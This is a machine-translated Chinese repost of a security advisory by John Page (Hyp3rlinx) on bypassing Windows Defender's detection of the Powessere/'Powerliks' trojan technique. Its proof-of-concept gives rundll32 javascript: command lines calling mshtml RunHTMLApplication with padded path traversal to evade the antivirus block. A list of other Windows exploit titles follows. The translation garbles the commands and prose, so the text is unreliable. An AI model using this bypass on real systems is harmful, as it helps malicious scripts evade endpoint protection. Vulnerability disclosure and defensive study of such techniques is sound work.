Microsoft Windows Defender-检测缓解旁路Trojanwin32Powessere.g

HackApt-37 Team · 04 9, 2025

[+] Credits: John Page（又名Hyp3rlinx）
[+]网站: hyp3rlinx.altervista.org
[+]源: https://hyp3rlinx.altervista.org/ad...mitigation_bypass_bypass_part_part_part_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Windows Defender
[漏洞类型]
Windows Defender检测缓解旁路
trojanwin32powessere.g
[CVE参考]
N/A。
[安全问题]
通常，Windows Defender检测并防止Trojanwin32Powessere.g aka“ Powerliks”类型执行，该执行利用Rundll32.exe。尝试执行失败
攻击者通常会获得“访问被拒绝”错误消息。
早在2022年，我首先披露了如何通过引用MSHTML的额外路径遍历来轻松绕过它，但此后已得到缓解。
最近，我2024年2月7日，我使用Multi-Commas'披露，“将绕过该缓解措施，但此后再次被修复。
该修复程序很短，我发现不久之后的另一个第三次小途径。
[漏洞/POC]
打开命令提示符作为管理员。
c: \ secrundll32.exe javascript:'\ . \ . \ mshtml，runhtmlapplication'; arter（13）
访问被拒绝。
c: \ secrundll32.exe javascript:'\\ . \\ . \\ \\ \ \\ \\ \\ \ \\ \\ . \\ . \\ \\ \\\\\\\\\\\\\\\\\\ runhtmlapplication'; arter
[视频POC URL]

[网络访问]
当地的
[严重性]
高的
[参考]

正在加载...

hyp3rlinx.altervista.org

正在加载...

hyp3rlinx.altervista.org

https://twitter.com/x/status/1755417914599956833

https://twitter.com/x/status/1758624140213264601

[披露时间表]
供应商通知:
2024年2月16日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供，没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配，只要除了对其进行改革，没有对其进行更改，并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责，并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容（c）。
HYP3RLINX

H	Microsoft Windows Defender/trojan.win32/powessere.g-检测缓解旁路 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows Defender -VBScript检测旁路 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows Defender旁路- 缓解检测旁路 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows -NTLM哈希泄漏恶意窗户主题 HackApt-37 Team 04 9, 2025 POC/?Day
H	Microsoft Windows 10.0.17763.5458-内核特权升级 HackApt-37 Team 04 9, 2025 POC/?Day